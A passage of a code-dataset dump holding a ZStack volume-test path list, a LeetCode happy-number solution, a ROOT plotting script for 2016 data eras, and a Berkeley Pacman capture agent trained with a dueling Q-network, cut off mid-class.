[TestAction.create_volume, \"volume4\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume4\"], \\\n [TestAction.create_volume, \"volume5\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume5\"], \\\n [TestAction.create_volume, \"volume6\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume6\"], \\\n [TestAction.create_volume, \"volume7\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume7\"], \\\n [TestAction.create_volume, \"volume8\", \"=scsi,shareable\"], \\\n [TestAction.attach_volume, \"vm1\", \"volume8\"], \\\n [TestAction.detach_volume, \"volume1\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume2\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume3\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume4\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume5\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume6\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume7\", \"vm1\"], \\\n [TestAction.detach_volume, \"volume8\", \"vm1\"], \\\n\t\t[TestAction.create_volume, \"volume9\", \"=scsi\"], \\\n\t\t[TestAction.create_volume, \"volume10\", \"=scsi\"], \\\n\t\t[TestAction.create_image_from_volume, \"vm1\", \"image1\"], \\\n\t\t[TestAction.attach_volume, \"vm1\", \"volume9\"], \\\n\t\t[TestAction.create_volume_backup, \"volume9\", \"backup1\"], \\\n\t\t[TestAction.delete_volume, \"volume9\"], \\\n\t\t[TestAction.reboot_vm, \"vm1\"], \\\n\t\t[TestAction.attach_volume, \"vm1\", \"volume10\"], \\\n\t\t[TestAction.create_volume_backup, \"volume10\", \"backup2\"], \\\n\t\t[TestAction.reboot_vm, \"vm1\"], \\\n\t\t[TestAction.ps_migrate_volume, \"volume3\"], \\\n\t\t[TestAction.reboot_vm, \"vm1\"]])\n","sub_path":"integrationtest/vm/multihosts/volumes/paths/path88.py","file_name":"path88.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640539768","text":"# -*- coding: utf-8 -*-\n# @Author: Orange灬Fish\n# @Date: 2019-05-06 22:21:35\n# @Last Modified by: Orange灬Fish\n# @Last Modified time: 2019-05-06 22:51:37\n\n\nclass Solution:\n\tdef isHappy(self, n):\n\n\t\tsqr = []\n\n\t\tdef judge(n):\n\t\t\tif n == 1:\n\t\t\t\treturn True\n\t\t\ts = str(n)\n\t\t\tnextnum = 0\n\t\t\tfor i in s:\n\t\t\t\tnextnum += int(i) ** 2\n\t\t\tif nextnum == 1:\n\t\t\t\treturn True\n\t\t\tif nextnum in sqr:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tsqr.append(nextnum)\n\t\t\t\treturn judge(nextnum)\n\n\t\treturn judge(n)\n\n","sub_path":"Leetcode/leetcode202 快乐数.py","file_name":"leetcode202 快乐数.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312317993","text":"import ROOT\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport re\n\n#list files\npath='UEanalysis/analysis'\nonlyfiles = [f for f in listdir(path) if 'MuonEG' in f]\n\ndist='chmult_None_inc_None_True'\n#dist='chflux_None_inc_None_True'\n#dist='chfluxz_None_inc_None_True'\n#dist='chavgpt_None_inc_None_True'\n#dist='chavgpz_None_inc_None_True'\n#dist='aplanarity_None_inc_None_True'\n#dist='sphericity_None_inc_None_True'\n#dist='C_None_inc_None_True'\n#dist='D_None_inc_None_True'\n\nplots={}\ntotal=None\nfor f in onlyfiles:\n era=re.search('(?<=2016)\\w+', f).group(0)[0]\n era='BCDEF' if era in ['B','C','D','E','F'] else 'GH'\n\n #getdistribution from file\n fIn=ROOT.TFile.Open(join(path,f))\n h=fIn.Get(dist)\n if not era in plots:\n plots[era]=h.Clone(era)\n plots[era].SetTitle(era)\n plots[era].SetDirectory(0)\n else:\n plots[era].Add(h)\n if total is None:\n total=h.Clone('total')\n total.SetTitle('2016')\n total.SetDirectory(0)\n else:\n total.Add(h)\n fIn.Close()\n\nROOT.gROOT.SetBatch(True)\nROOT.gStyle.SetOptStat(0)\nROOT.gStyle.SetOptTitle(0)\nfrom TopLJets2015.TopAnalysis.Plot import Plot\np=Plot(dist)\ncolors={'B':ROOT.kOrange-8,\n 'C':ROOT.kOrange-6,\n 'D':ROOT.kOrange-4,\n 'E':ROOT.kOrange+4,\n 'F':ROOT.kBlue+2,\n 'BCDEF':ROOT.kOrange-4,\n 'G':ROOT.kBlue-4,\n 'H':ROOT.kBlue-9,\n 'GH':ROOT.kBlue-9,\n }\nfor era in plots:\n plots[era].Scale(1./plots[era].Integral())\n p.add(plots[era],era,colors[era],False,False,False)\ntotal.Scale(1./total.Integral())\np.add(total,'2016',1,True,True,False)\np.ratiorange=(0.7,1.3)\np.doPoissonErrorBars=False\np.show(outDir=' ~/www/TopUE_ReReco2016/eras/',lumi=35900,noStack=True,noRatio=False) #True)\n#raw_input()\n","sub_path":"TopAnalysis/test/TopUEAnalysis/compareEras.py","file_name":"compareEras.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"41558334","text":"# myTeam.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom captureAgents import CaptureAgent\nimport random, time, util\n#from game import Directions\n#from game import Grid\n#import game\nimport math\nimport time\n#import pandas as pd\nimport numpy as np\n#import functools\n#import operator\n\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import StandardScaler\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#import os.path\nfrom os import path\n\n\n#################\n# Team creation #\n#################\n\ndef createTeam(firstIndex, secondIndex, isRed, first='Agent_North', second='Agent_South'):\n \"\"\"\n This function should return a list of two agents that will form the\n team, initialized using firstIndex and secondIndex as their agent\n index numbers. isRed is True if the red team is being created, and\n will be False if the blue team is being created.\n\n As a potentially helpful development aid, this function can take\n additional string-valued keyword arguments (\"first\" and \"second\" are\n such arguments in the case of this function), which will come from\n the --redOpts and --blueOpts command-line arguments to capture.py.\n For the nightly contest, however, your team will be created without\n any extra arguments, so you should make sure that the default\n behavior is what you want for the nightly contest.\n \"\"\"\n\n # The following line is an example only; feel free to change it.\n return [eval(first)(firstIndex), eval(second)(secondIndex)]\n\n\n##########\n# Agents #\n##########\n\nclass Comrades(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n\n\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, p2)\n\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n\n '''\n Your initialization code goes here, if you need any.\n '''\n self.field_width = gameState.data.layout.width\n self.field_height = gameState.data.layout.height\n self.field_mid_width = int((self.field_width - 2) / 2)\n self.field_mid_height = int((self.field_height - 2) / 2)\n self.my_indices, self.enemy_indices = self.get_indices(gameState)\n self.food_inside = 0\n self.food_inside_prev = 0\n self.approaching_food_reward = 0\n self.prev_current_food_amount = len(gameState.getBlueFood().asList())\n self.drop_positions = self.get_drop_positions(gameState)\n self.approaching_drop_reward = 0\n self.approaching_enemy_reward = 0\n self.flag_food_eaten = False # if pellet consumed by agent\n self.flag_death = False # if agent got eaten\n self.flag_enemy_around = False # if enemy is around\n self.flag_enemy_death = False # if enemy got eaten\n self.turn_counter = 0\n self.prev_best_action = 'Stop'\n\n self.my_initial_pos = gameState.getInitialAgentPosition(self.index)\n\n self.data_set_current = []\n self.data_actions = ['Stop']\n\n self.epsilon = 0.2 # exploration rate\n self.gamma = 0.85 # gamma for discounted reward\n self.epochs = 100 # number of epochs for learning\n self.learning_step = 20 # update Q-target function\n self.history_size = 10000 # amount of samples kept from previous games\n self.train_buffer_size = 1000\n\n self.flag_delay = False # slow game visualisation\n\n # -=REWARD modifiers=-\n self.reward_modifiers()\n\n # variables for functions and classes\n self.state_data = self.create_state_data_simple\n self.add_reward = self.add_reward\n self.Duel_Q_Network = Duel_Q_Network_simple\n\n self.rewards_values = np.empty(0) # reward for each step\n self.flag_done = False # if game over\n\n self.online_Q_network, self.optimizer, self.my_scaler, self.my_history, self.total_epochs, self.num_games_played = self.load_model()\n\n #self.my_scaler = Normalizer()\n\n\n # return 2 arrays of our indices and enemy indices\n def get_indices(self, gameState):\n if self.red:\n return gameState.getRedTeamIndices(), gameState.getBlueTeamIndices()\n else:\n return gameState.getBlueTeamIndices(), gameState.getRedTeamIndices()\n\n # transform string action to the integer index\n def action_to_index(self, act):\n def stop():\n return 0\n def north():\n return 1\n def east():\n return 2\n def south():\n return 3\n def west():\n return 4\n switcher = {\n 'Stop': stop,\n 'North': north,\n 'East': east,\n 'South': south,\n 'West': west\n }\n return switcher[act]()\n\n # transform string actions array to integer index array\n def actions_to_indices(self, acts):\n result = []\n for act in acts:\n result.append(self.action_to_index(act))\n return result\n\n # transform index to string action\n def index_to_action(self, index):\n actions = ['Stop', 'North', 'East', 'South', 'West']\n return actions[index]\n\n # return new position\n def action_to_pos(self, action, pos):\n new_pos = list(pos)\n def stop():\n return\n def north():\n new_pos[1] += 1\n def east():\n new_pos[0] += 1\n def south():\n new_pos[1] -= 1\n def west():\n new_pos[0] -= 1\n switcher = {\n 'Stop': stop,\n 'North': north,\n 'East': east,\n 'South': south,\n 'West': west\n }\n switcher[action]()\n return tuple(new_pos)\n\n # FEATURE SPACE of games state\n def create_state_data_simple(self, gameState):\n self.score = self.getScore(gameState)\n # food, drop, capsule, enemy prediction per action: -1 for leave, 1 for approach\n food_future_dist = np.zeros(5)\n capsule_future_dist = np.zeros(5)\n drop_future_dist = np.zeros(5)\n enemy_future_dist = np.zeros((2, 5))\n\n grid_qualities = np.zeros(12, dtype=int)\n\n #flag_enemy = False\n\n if not self.flag_done:\n # enemy data\n for i, item in enumerate(self.enemy_data):\n if item:\n #flag_enemy = True\n pos, dist, timer = item\n grid_qualities[2 + i] = timer\n grid_qualities[4 + i] = 5 / dist\n for action in self.actions:\n j = self.action_to_index(action)\n enemy_future_dist[i, j] = self.get_approaching_enemy_reward(gameState, action, pos, dist, timer)\n\n for action in self.actions:\n ind = self.action_to_index(action)\n drop_future_dist[ind] = self.get_approaching_drop_reward(gameState, action)\n food_future_dist[ind] = self.get_approaching_food_reward(gameState, action)\n capsule_future_dist[ind] = self.get_approaching_capsule_reward(gameState, action)\n\n # my scary timer grid_qualities[0] relative position grid_qualities[1]\n x_t = self.my_current_position[0]\n grid_qualities[0] = gameState.getAgentState(self.index).scaredTimer\n # relative x of the agent\n n = 1 if self.red else -1\n grid_qualities[1] = (x_t - self.field_mid_width) / self.field_width * n\n\n grid_qualities[6] = self.score\n grid_qualities[7] = 5 / (self.my_capsule_distance + 1)\n grid_qualities[8] = self.food_inside\n grid_qualities[9] = self.current_food_amount\n grid_qualities[10] = self.enemy_food_amount\n self.turn_counter += 1\n grid_qualities[11] = 20 / (301 - self.turn_counter)\n\n return np.concatenate((food_future_dist, drop_future_dist, capsule_future_dist, enemy_future_dist.ravel(),grid_qualities))\n\n # return arrays of positions of our food, enemy food, our capsules, enemy capsules\n def all_food_positions(self, gameState):\n blue_food = gameState.getBlueFood().asList()\n red_food = gameState.getRedFood().asList()\n blue_capsules = gameState.getBlueCapsules()\n red_capsules = gameState.getRedCapsules()\n if self.red:\n current_food_positions = blue_food\n enemy_food_positions = red_food\n capsules_for_me = blue_capsules\n capsules_for_enemy = red_capsules\n else:\n current_food_positions = red_food\n enemy_food_positions = blue_food\n capsules_for_me = red_capsules\n capsules_for_enemy = blue_capsules\n return current_food_positions, enemy_food_positions, capsules_for_me, capsules_for_enemy\n\n # get power capsules from enemy side and distance\n def get_capsules_for_me_dist(self):\n capsules = self.capsules_for_us\n if len(capsules) > 0:\n dist = min([self.getMazeDistance(self.my_current_position, cap) for cap in capsules])\n else:\n dist = float('inf')\n return capsules, dist\n\n # return approaching food reward\n def get_approaching_food_reward(self, gameState, action):\n reward = 0\n if len(self.my_food_positions) > 0:\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = min([self.getMazeDistance(my_new_pos, food) for food in self.my_food_positions])\n if new_distance > self.my_food_distance:\n reward = -1\n elif new_distance < self.my_food_distance:\n reward = 1\n return reward\n\n # return approaching capsule reward\n def get_approaching_capsule_reward(self, gameState, action):\n reward = 0\n if len(self.capsules_for_me) > 0:\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = min([self.getMazeDistance(my_new_pos, cap) for cap in self.capsules_for_me])\n if new_distance > self.my_capsule_distance:\n reward = -1\n elif new_distance < self.my_capsule_distance:\n reward = 1\n return reward\n\n # return approaching drop reward\n def get_approaching_drop_reward(self, gameState, action):\n reward = 0\n if self.at_home(self.my_current_position, 0):\n return reward\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = min([self.getMazeDistance(my_new_pos, drop) for drop in self.drop_positions])\n if new_distance > self.current_drop_distance:\n reward = -1\n elif new_distance < self.current_drop_distance:\n reward = 1\n return reward\n\n # fill self.enemy_data\n def create_enemy_data(self, gameState):\n for i, ind in enumerate(self.enemy_indices):\n pos = gameState.getAgentPosition(ind)\n if pos and self.get_manh_dist(pos, self.my_current_position):\n timer = gameState.getAgentState(ind).scaredTimer\n dist = self.getMazeDistance(pos, self.my_current_position)\n self.enemy_data[i] = (pos, dist, timer)\n\n # return approaching enemy reward/penalty\n def get_approaching_enemy_reward(self, gameState, action, pos, dist, timer):\n reward = 0\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_dist = self.getMazeDistance(my_new_pos, pos)\n adjustment = 0\n if new_dist > dist:\n adjustment = 1\n elif new_dist < dist:\n adjustment = -1\n\n enemy_home = self.at_home(pos, 0)\n enemy_scared = timer > 0\n self_scared = gameState.getAgentState(self.index).scaredTimer > 0\n\n if (not enemy_home and enemy_scared) or (enemy_home and not self_scared):\n reward -= adjustment\n else:\n reward += adjustment\n return reward\n\n # get manhattan distance\n def get_manh_dist(self, pos1, pos2):\n dist = abs(pos1[0] - pos2[0]) + abs(pos1[1] - pos2[1])\n if dist > 5:\n return False\n else:\n return True\n\n # return array of all food-drop positions on the board\n def get_drop_positions(self, gameState):\n positions = []\n x = self.field_mid_width\n if not self.red:\n x += 1\n h = int(self.field_mid_height * 2 + 1)\n for y in range(1, h):\n if not gameState.hasWall(x, y):\n positions.append((x, y))\n return positions\n\n # if action results in eating pellet\n def food_eaten_flag(self, gameState, best_action):\n flag = False\n successor = self.getSuccessor(gameState, best_action)\n if self.red:\n food = successor.getBlueFood().asList()\n else:\n food = successor.getRedFood().asList()\n if self.current_food_amount == len(food) + 1:\n flag = True\n return flag\n\n # get enemy's death flag\n def check_enemy_deaf(self, gameState, action, pos, timer):\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n if pos == my_new_pos:\n e_s = timer > 0\n m_s = gameState.getAgentState(self.index).scaredTimer > 0\n cond_1 = not self.at_home(my_new_pos, 0) and not self.at_home(pos, 0) and e_s\n cond_2 = self.at_home(my_new_pos, 0) and self.at_home(pos, 0) and not m_s\n if cond_1 or cond_2:\n return True\n return False\n\n # check if position in our side of the board\n def at_home(self, my_pos, deep):\n if (self.red and my_pos[0] <= self.field_mid_width - deep) or (\n not self.red and my_pos[0] > self.field_mid_width + deep):\n return True\n return False\n\n # calculate and add reward for each turn to the reward array\n def add_reward(self):\n reward = 0\n if self.prev_best_action == 'Stop':\n reward -= self.penalty\n # if self.flag_done:\n # reward += self.score * self.score_multiplier\n # if self.score > 0:\n # reward += self.win_reward\n # elif self.score < 0:\n # reward -= self.win_reward\n\n if self.flag_enemy_death:\n reward += self.enemy_death_reward\n elif self.flag_death:\n reward -= self.my_death_penalty\n\n if self.food_inside == 0:\n reward += self.food_inside_prev * self.drop_food_multiplier\n elif self.flag_food_eaten:\n reward += self.food_eaten_reward\n\n if self.flag_enemy_around:\n reward += self.approaching_enemy_reward * self.approaching_enemy_multiplier\n elif self.food_inside_prev >= self.stomach_size or self.prev_current_food_amount < 3:\n reward += self.approaching_drop_reward * self.approaching_drop_multiplier\n else:\n reward += self.approaching_food_reward * self.approaching_food_multiplier\n\n self.rewards_values = np.concatenate((self.rewards_values, [reward]))\n\n # helper function for chooseAction\n def choose_action_by_probability(self, output):\n tempo = np.array([output[i] for i in range(output.shape[0]) if self.index_to_action(i) in self.actions])\n tempo = np.exp((tempo - tempo.max()) / 1)\n tempo = tempo / np.sum(tempo)\n self.best_action = np.random.choice(self.actions, p=tempo)\n\n # -=ACTION=-\n def chooseAction(self, gameState):\n \"\"\"\n Picks among actions randomly.\n \"\"\"\n if self.flag_delay:\n time.sleep(0.04)\n\n self.actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n\n self.my_current_position = gameState.getAgentState(self.index).getPosition()\n self.is_home = self.at_home(self.my_current_position, 0)\n if self.is_home:\n self.food_inside = 0\n\n self.current_drop_distance = min([self.getMazeDistance(self.my_current_position, drop) for drop in self.drop_positions])\n\n self.current_food_positions, self.enemy_food_positions, self.capsules_for_us, self.capsules_for_enemy = self.all_food_positions(gameState)\n self.capsules_for_me, self.my_capsule_distance = self.get_capsules_for_me_dist()\n\n #self.current_food_positions.sort(key=lambda x: x[1])\n self.current_food_amount = len(self.current_food_positions)\n self.enemy_food_amount = len(self.enemy_food_positions)\n self.my_food_positions = self.get_my_food_positions()\n if len(self.my_food_positions) > 0:\n self.my_food_distance = min([self.getMazeDistance(self.my_current_position, food) for food in self.my_food_positions])\n else:\n self.my_food_distance = float('inf')\n\n\n self.enemy_data = [None, None]\n self.create_enemy_data(gameState)\n\n state_data = np.asarray(self.state_data(gameState))\n if self.flag_new_model:\n features = state_data\n else:\n features = self.my_scaler.transform(state_data.reshape(1, -1))[0]\n tensor_features = torch.FloatTensor(features).unsqueeze(0)\n self.online_Q_network.eval()\n result = self.online_Q_network(tensor_features).detach().numpy()[0]\n\n if random.random() < self.epsilon:\n self.choose_action_by_probability(result)\n #self.best_action = random.choice(self.actions)\n else:\n indices = result.argsort()[::-1]\n for ind in indices:\n self.best_action = self.index_to_action(ind.item())\n if self.best_action in self.actions:\n break\n\n self.flag_death = False\n if self.my_current_position == self.my_initial_pos:\n self.flag_death = True\n\n self.data_set_current.append(state_data)\n self.add_reward()\n self.data_actions.append(self.best_action)\n\n self.flag_food_eaten = self.food_eaten_flag(gameState, self.best_action)\n if self.flag_food_eaten:\n self.food_inside += 1\n self.food_inside_prev = self.food_inside\n self.prev_current_food_amount = self.current_food_amount\n\n self.approaching_food_reward = self.get_approaching_food_reward(gameState, self.best_action)\n self.approaching_drop_reward = self.get_approaching_drop_reward(gameState, self.best_action)\n\n self.approaching_enemy_reward = 0\n self.flag_enemy_around = False\n self.flag_enemy_death = False\n for item in self.enemy_data:\n if item:\n pos, dist, timer = item\n self.approaching_enemy_reward += self.get_approaching_enemy_reward(gameState, self.best_action, pos, dist, timer)\n self.flag_enemy_around = True\n self.flag_enemy_death = self.check_enemy_deaf(gameState, self.best_action, pos, timer)\n\n self.prev_best_action = self.best_action\n\n return self.best_action\n\n def getSuccessor(self, gameState, action):\n \"\"\"\n Finds the next successor which is a grid position (location tuple).\n \"\"\"\n successor = gameState.generateSuccessor(self.index, action)\n return successor\n\n def final(self, gameState):\n self.flag_done = True\n\n self.data_set_current.append(self.state_data(gameState))\n all_states = np.asarray(self.data_set_current)\n\n self.my_scaler.fit(all_states)\n all_states = self.my_scaler.transform(all_states)\n\n actions = np.asarray(self.actions_to_indices(self.data_actions))\n\n self.add_reward()\n rewards = self.rewards_values[1:]\n\n done = np.zeros(all_states.shape[0] - 1)\n done[-1] = 1\n\n states = torch.FloatTensor(all_states[:-1, :])\n next_states = torch.FloatTensor(all_states[1:, :])\n actions = torch.FloatTensor(actions[1:]).unsqueeze(1)\n rewards = torch.FloatTensor(rewards).unsqueeze(1)\n done = torch.FloatTensor(done).unsqueeze(1)\n\n states, next_states, actions, rewards, done, history = self.create_tensors_and_history(states, next_states, actions, rewards, done)\n\n target_Q_network = self.Duel_Q_Network()\n self.online_Q_network.train()\n\n # debugging\n #print('SIZE buffer: ', done.size())\n #self.optimizer = torch.optim.Adam(self.online_Q_network.parameters(), lr=1e-4)\n #losses = []\n\n for epoch in range(self.epochs):\n if epoch % self.learning_step == 0:\n target_Q_network.load_state_dict(self.online_Q_network.state_dict())\n with torch.no_grad():\n online_Q_next = self.online_Q_network(next_states)\n target_Q_next = target_Q_network(next_states)\n online_max_action = torch.argmax(online_Q_next, dim=1, keepdim=True)\n y = rewards + (1 - done) * self.gamma * target_Q_next.gather(1, online_max_action.long())\n\n loss = F.mse_loss(self.online_Q_network(states).gather(1, actions.long()), y)\n\n # debugging\n #losses.append(loss.item())\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n self.total_epochs += self.epochs\n self.num_games_played += 1\n\n # debugging\n if self.num_games_played % 5 == 0:\n #print('Total Epochs: ', self.total_epochs)\n print('-=TOTAL GAMES=- ', self.num_games_played)\n #print(losses)\n print('Reward Sum: ', np.sum(self.rewards_values[1:]))\n #print(self.rewards_values[1:])\n #print(self.data_actions[1:])\n\n self.save_model(self.online_Q_network, self.optimizer, self.my_scaler, history, self.total_epochs, self.num_games_played)\n\n # load model\n def load_model_helper(self, side):\n file_path = 'model_' + side + '.pth'\n online_Q_network = self.Duel_Q_Network()\n optimizer = torch.optim.Adam(online_Q_network.parameters(), lr=1e-4)\n scaler = StandardScaler()\n history = None\n epochs = 0\n games = 0\n self.flag_new_model = True\n if path.exists(file_path):\n state = torch.load(file_path)\n online_Q_network.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n scaler = state['scaler']\n history = state['history']\n epochs = state['epochs']\n games = state['games']\n self.flag_new_model = False\n return online_Q_network, optimizer, scaler, history, epochs, games\n\n # save model\n def save_model_helper(self, side, model, optimizer, scaler, history, epochs, games):\n file_path = 'model_' + side + '.pth'\n my_model = {'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'scaler': scaler,\n 'history': history,\n 'epochs': epochs,\n 'games': games}\n torch.save(my_model, file_path)\n\n # create tensors for learning and data history for the future\n def create_tensors_and_history_old(self, states, next_states, actions, rewards, done):\n if self.my_history is None:\n history = self.create_history(states, next_states, actions, rewards, done)\n return states, next_states, actions, rewards, done, history\n\n r_states = torch.cat((states, self.my_history['states']))\n r_next_states = torch.cat((next_states, self.my_history['next_states']))\n r_actions = torch.cat((actions, self.my_history['actions']))\n r_rewards = torch.cat((rewards, self.my_history['rewards']))\n r_done = torch.cat((done, self.my_history['done']))\n\n k = r_done.size(0)\n perm = torch.randperm(k)\n if k > self.history_size:\n k = self.history_size\n idx = perm[:k]\n history = self.create_history(r_states[idx], r_next_states[idx], r_actions[idx], r_rewards[idx], r_done[idx])\n return r_states, r_next_states, r_actions, r_rewards, r_done, history\n def create_tensors_and_history(self, states, next_states, actions, rewards, done):\n if self.my_history is None:\n history = self.create_history(states, next_states, actions, rewards, done)\n return states, next_states, actions, rewards, done, history\n\n k = self.my_history['done'].size(0)\n perm = torch.randperm(k)\n c = k\n if k > self.train_buffer_size:\n c = self.train_buffer_size\n idx = perm[:c]\n\n r_states = torch.cat((states, self.my_history['states'][idx]))\n r_next_states = torch.cat((next_states, self.my_history['next_states'][idx]))\n r_actions = torch.cat((actions, self.my_history['actions'][idx]))\n r_rewards = torch.cat((rewards, self.my_history['rewards'][idx]))\n r_done = torch.cat((done, self.my_history['done'][idx]))\n\n c = k\n if k > self.history_size:\n c = self.history_size\n idx = perm[:c]\n\n h_states = torch.cat((states, self.my_history['states'][idx]))\n h_next_states = torch.cat((next_states, self.my_history['next_states'][idx]))\n h_actions = torch.cat((actions, self.my_history['actions'][idx]))\n h_rewards = torch.cat((rewards, self.my_history['rewards'][idx]))\n h_done = torch.cat((done, self.my_history['done'][idx]))\n\n #print('SIZE history: ', h_done.size())\n\n history = self.create_history(h_states, h_next_states, h_actions, h_rewards, h_done)\n return r_states, r_next_states, r_actions, r_rewards, r_done, history\n\n # create history helper function\n def create_history(self, states, next_states, actions, rewards, done):\n return {'states': states, 'next_states': next_states, 'actions': actions, 'rewards': rewards, 'done': done}\n\n\nclass Agent_North(Comrades):\n def reward_modifiers(self):\n self.penalty = 0.3 # penalty for each turn\n self.score_multiplier = 0\n self.win_reward = 0\n self.enemy_death_reward = 5\n self.my_death_penalty = 5\n self.stomach_size = 3\n self.food_eaten_reward = 2\n self.drop_food_multiplier = 3\n self.approaching_drop_multiplier = 2\n self.approaching_enemy_multiplier = 2\n self.approaching_food_multiplier = 2\n\n # positions of the target food for the agent North\n def get_my_food_positions(self):\n # North & South\n # n = int(self.current_food_amount / 2)\n # return self.current_food_positions[n:]\n\n # Offense\n return self.current_food_positions\n\n def load_model(self):\n side = 'North'\n return self.load_model_helper(side)\n\n def save_model(self, model, optimizer, scaler, history, epochs, games):\n side = 'North'\n self.save_model_helper(side, model, optimizer, scaler, history, epochs, games)\n\n\nclass Agent_South(Comrades):\n def reward_modifiers(self):\n self.penalty = 0.3 # penalty for each turn\n self.score_multiplier = 0\n self.win_reward = 0\n self.enemy_death_reward = 5\n self.my_death_penalty = 5\n self.stomach_size = 3\n self.food_eaten_reward = 1\n self.drop_food_multiplier = 1\n self.approaching_drop_multiplier = 2\n self.approaching_enemy_multiplier = 2\n self.approaching_food_multiplier = 2\n\n # positions of the target food for the agent South\n def get_my_food_positions(self):\n # North & South\n # n = int((self.current_food_amount + 1) / 2)\n # return self.current_food_positions[:n]\n\n # Deffense\n return self.enemy_food_positions\n\n # get capsules from our side and distance\n def get_capsules_for_me_dist(self):\n capsules = self.capsules_for_enemy\n if len(capsules) > 0:\n dist = min([self.getMazeDistance(self.my_current_position, cap) for cap in capsules])\n else:\n dist = float('inf')\n return capsules, dist\n\n # defend food on home side\n def get_approaching_food_reward(self, gameState, action):\n reward = 0\n if len(self.my_food_positions) > 0:\n pos = random.choice(self.my_food_positions)\n dist = self.getMazeDistance(pos, self.my_current_position)\n my_new_pos = self.action_to_pos(action, self.my_current_position)\n new_distance = self.getMazeDistance(pos, my_new_pos)\n if new_distance > dist:\n reward = -1\n elif new_distance < dist:\n reward = 1\n return reward\n\n def load_model(self):\n side = 'South'\n return self.load_model_helper(side)\n\n def save_model(self, model, optimizer, scaler, history, epochs, games):\n side = 'South'\n self.save_model_helper(side, model, optimizer, scaler, history, epochs, games)\n\n\nclass Duel_Q_Network_1000(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_1000, self).__init__()\n\n self.fc1 = nn.Linear(1125, 800)\n self.fc2 = nn.Linear(800, 512)\n\n self.fc_value = nn.Linear(512, 128)\n self.fc_adv = nn.Linear(512, 128)\n\n self.value = nn.Linear(128, 1)\n self.adv = nn.Linear(128, 5)\n\n self.a_func = nn.Sigmoid()\n #self.a_func = nn.LeakyReLU()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n y = self.a_func(self.fc2(y))\n\n value = self.a_func(self.fc_value(y))\n adv = self.a_func(self.fc_adv(y))\n\n value = self.value(value)\n adv = self.adv(adv)\n\n adv_average = torch.mean(adv, dim=1, keepdim=True)\n Q = value + adv - adv_average\n\n return Q\n\nclass Duel_Q_Network_simple(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_simple, self).__init__()\n\n self.fc1 = nn.Linear(37, 43)\n self.fc2 = nn.Linear(43, 29)\n\n self.fc_value = nn.Linear(29, 11)\n self.fc_adv = nn.Linear(29, 13)\n\n self.value = nn.Linear(11, 1)\n self.adv = nn.Linear(13, 5)\n\n self.a_func = nn.Tanh()\n #self.a_func = nn.Sigmoid()\n #self.a_func = nn.LeakyReLU()\n\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n torch.nn.init.xavier_uniform_(mod.weight)\n\n def forward(self, state):\n y = self.a_func(self.fc1(state))\n y = self.a_func(self.fc2(y))\n\n value = self.a_func(self.fc_value(y))\n adv = self.a_func(self.fc_adv(y))\n\n value = self.value(value)\n adv = self.adv(adv)\n\n adv_average = torch.mean(adv, dim=1, keepdim=True)\n Q = value + adv - adv_average\n\n return Q\n\nclass Duel_Q_Network_very_simple(nn.Module):\n def __init__(self):\n super(Duel_Q_Network_very_simple, self).__init__()\n\n self.fc1 = nn.Linear(37, 23)\n\n self.fc_value = nn.Linear(23, 7)\n self.fc_adv = nn.Linear(23, 11)\n\n self.value = nn.Linear(7, 1)\n self.adv = nn.Linear(11, 5)\n\n self.a_func = nn.Tanh()\n # self.a_func = nn.Sigmoid()\n 